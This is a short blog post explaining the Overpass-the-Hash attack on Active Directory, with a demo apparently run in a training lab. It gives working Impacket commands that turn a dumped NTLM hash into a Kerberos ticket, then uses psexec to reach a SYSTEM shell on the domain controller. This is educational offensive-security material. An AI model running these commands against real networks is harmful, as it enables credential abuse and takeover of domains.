Post cover image

June 2, 2026

Active Directory Attacks — OverPass The Hash

Overpass-the-Hash is a post-exploitation technique in Active Directory environments where an attacker uses an NTLM hash to obtain a…

Osec

1 min read

Overpass-the-Hash is a post-exploitation technique in Active Directory environments where an attacker uses an NTLM hash to obtain a Kerberos ticket**, instead of authenticating directly with NTLM. It allows an attacker to take an** NTLM hash and use it to request a Kerberos TGT from the domain controller.

Kerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.

When attackers know the RC4 key (which is in fact the user's NT hash), and when the RC4 etype is not disabled, they can use it to obtain Kerberos tickets.

Attack

Attack flow:

  1. Credential Dumping: The attacker gains administrative privileges on a local machine, extracts the NT hash of a specific user or service account from memory (LSASS) or disk (NTDS.dit).
  2. Authentication Request: Instead of performing a standard NTLM challenge-response, the attacker uses an offensive tool (like Mimikatz) to present the stolen hash to the Kerberos Key Distribution Center (KDC) requesting a Ticket-Granting Ticket (TGT).
  3. KDC Validation: The KDC validates the pre-authentication data encrypted with the user's hash.
  4. Ticket Issuance: The KDC returns a valid TGT to the attacker, treating the transaction exactly as if the user had supplied the original password.
  5. Lateral Movement: The attacker stores this TGT in the current session's memory and proceeds with Pass-the-Ticket operations, requesting Ticket-Granting Service (TGS) tickets to access restricted network resources on behalf of the compromised identity.

For the demo part let's assume that we already have the NTLM Hash for the domain user BRoss ( e.g: by dumping the lsass memory ).

from our linux attacking machine :

NTLM hash → used as RC4 key → request TGT → save as .ccache → use Kerberos (-k)

before we do any kerberos stuff we must configure the system clock to match the clock of the domain controller ( KDC ).

sudo ntpdate -u 10.129.202.146

requesting a TGT :

impacket-getTGT INLANEFREIGHT.LOCAL/BRoss -hashes :49a074a39dd0651f647e765c2cc794c7 -dc-ip 10.129.202.146
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in BRoss.ccache

Tell Linux to use that ticket:

export KRB5CCNAME=/tmp/BRoss.ccache

verify:

┌──(kolio㉿localhost)-[/tmp]
└─$ klist
Ticket cache: FILE:/tmp/BRoss.ccache
Default principal: BRoss@INLANEFREIGHT.LOCAL

Valid starting       Expires              Service principal
03/26/2026 17:11:58  03/27/2026 03:11:58  krbtgt/INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
 renew until 03/27/2026 17:11:58

use the ticket:

impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/BRoss@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file FaCJDxae.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service gZGY on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service gZGY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

subscribe to get notified whenever a new article is published !

Follow me on X : https://x.com/osec403